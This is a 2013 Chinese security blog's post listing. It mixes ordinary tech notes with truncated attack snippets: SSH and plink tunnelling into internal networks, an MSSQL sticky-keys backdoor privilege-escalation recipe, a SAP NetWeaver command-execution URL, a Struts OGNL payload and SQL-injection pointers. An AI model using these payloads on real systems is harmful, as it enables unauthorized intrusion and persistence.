cnbird's blog

cnbird's blog

sockscap

http://www.networktunnel.net/ http://www.networktunnel.net/dwn/socks5capsetup.exe

2013-04-27 17:33:45

阅读数 1011

评论数 1

SSH端口转发内网

ssh -C -f -N -g -R 1080:127.0.0.1:1080 gg@1.1.1.1 gatewayports yes

2013-04-27 16:18:29

阅读数 884

评论数 0

[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin

Author: Janek Vind "waraxe" Date: 25. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-103.html Description o...

2013-04-27 14:57:54

阅读数 690

评论数 0

C语言程序设计自学全套视频教程 C++数据结构 编程

http://item.taobao.com/item.htm?spm=937.1000770.1000419.1.Dpet1P&id=17241266164&asker=wangwang&wwdialog=bbxxbbmc&ad_id=&am_id=&am...

2013-04-26 11:30:07

阅读数 3044

评论数 1

下一代的snort

http://www.openinfosecfoundation.org/index.php/download-suricata https://github.com/firnsy/barnyard2

2013-04-24 15:36:44

阅读数 1092

评论数 0

Resin远程信息泄露漏洞

受影响系统:   Caucho Technology Resin v3.1.0 for Windows   Caucho Technology Resin v3.0.21 for Windows   Caucho Technology Resin v3.0.20 for Windows  ...

2013-04-24 09:33:56

阅读数 3724

评论数 0

TRS WCM SQL injection

来源http://www.wooyun.org/bugs/wooyun-2013-019753 首先是这个页面,好像是越权了 http://xxxx/portal/db/dbupdatelog_list.jsp 正常应该要登陆才能看吧? 直接注入 http://xx/portal/db/...

2013-04-23 11:00:22

阅读数 1562

评论数 0

hadoop 绑定到IPV4上

可以用netstat -anp |grep myport看本机要启动的服务是否启动到位,经常遇到的情况是地址绑定到ipv6上了,这里两种思路:一是彻底禁用ipv6,而是在hadoop-evn.sh中添加"export HADOOP_OPTS="-Djava.net.prefer...

2013-04-22 21:50:03

阅读数 1735

评论数 0

Redis 设计与实现

http://www.redisbook.com/en/latest/

2013-04-22 09:46:59

阅读数 564

评论数 0

sap安全扫描厂家

http://www.esnc.de/esnc-sap-security-audit-software/esnc-security-suite-sap-security-scanner.html

2013-04-22 09:36:53

阅读数 678

评论数 0

1433映像劫持后门提权

首先: 1.服务器开启了终端端口(终端端口未必是3389,可以自行查询) 2.服务器的粘滞键功能无损,只要可以正常弹出即可 3.服务器未禁止注册表编辑(即写入功能) sql命令读取服务器终端端口: exec master..xp_regread 'HKEY_LOCAL_MACHI...

2013-04-21 17:45:11

阅读数 1873

评论数 0

ssh plink 端口转发

动态转发 plink -N 222.222.222.222 -D 127.0.0.1:7070 远端访问本机 plink -N -R 2222:localhost:5080 222.222.222.222 穿内网 plink -N -L 5900:192.168.222.222:5900...

2013-04-21 16:02:39

阅读数 2702

评论数 1

sap netweaver命令执行漏洞

留了半年还是被放出来了幸好还有一个命令执行没有被暴出来 https://XXX/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=id

2013-04-21 13:49:28

阅读数 4097

评论数 0

sap netweaver代码审计

源代码目录 e:\usr\sap\EDS\DVEBMGS20\j2ee\cluster\server0\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\

2013-04-21 12:07:46

阅读数 930

评论数 0

Lotus Domino Web Administrator – Cross Site Command Execution

Description Lotus Domino is vulnerable to CSRF attack which can de used for OS command execution in webadmin.nsf database by using Quick Console. L...

2013-04-21 10:57:47

阅读数 1137

评论数 0

struts poc

class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22al...

2013-04-21 08:31:26

阅读数 1579

评论数 0

Oracle Label Security(Oracle标签安全性)

作者:Darl Kuhn、Steve Roughton Oracle Label Security(Oracle标签安全性)按行来控制用户的访问。 绝大多数商业应用程序都必须处理安全性问题。应用程序经常需要限制对专用记录的访问、建立审计跟踪,或者执行一个工作流过程,所有这些都要符合公司的安全策...

2013-04-17 17:40:10

阅读数 1668

评论数 0

Oracle_Label_Security[转]

前言: 在Oracle9i中有一个组件称为Oracle Label Security,这个组件实现了基于自定义策略而对数据库中的表甚或是整个Schema提供行级安全性功能。实际上Oracle Label Security是在Oracle8.1.7中提出的,在9i版本中功能得到了大幅度增强。 本...

2013-04-17 17:39:09

阅读数 728

评论数 0

[译]Nginx和Lua

这几个月里,我们逐步把Lua集成到Mixlr的前端Nginx配置中。 Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工...

2013-04-17 17:13:02

阅读数 1444

评论数 0

test-nginx

https://github.com/agentzh/test-nginx

2013-04-17 17:08:52

阅读数 1026

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭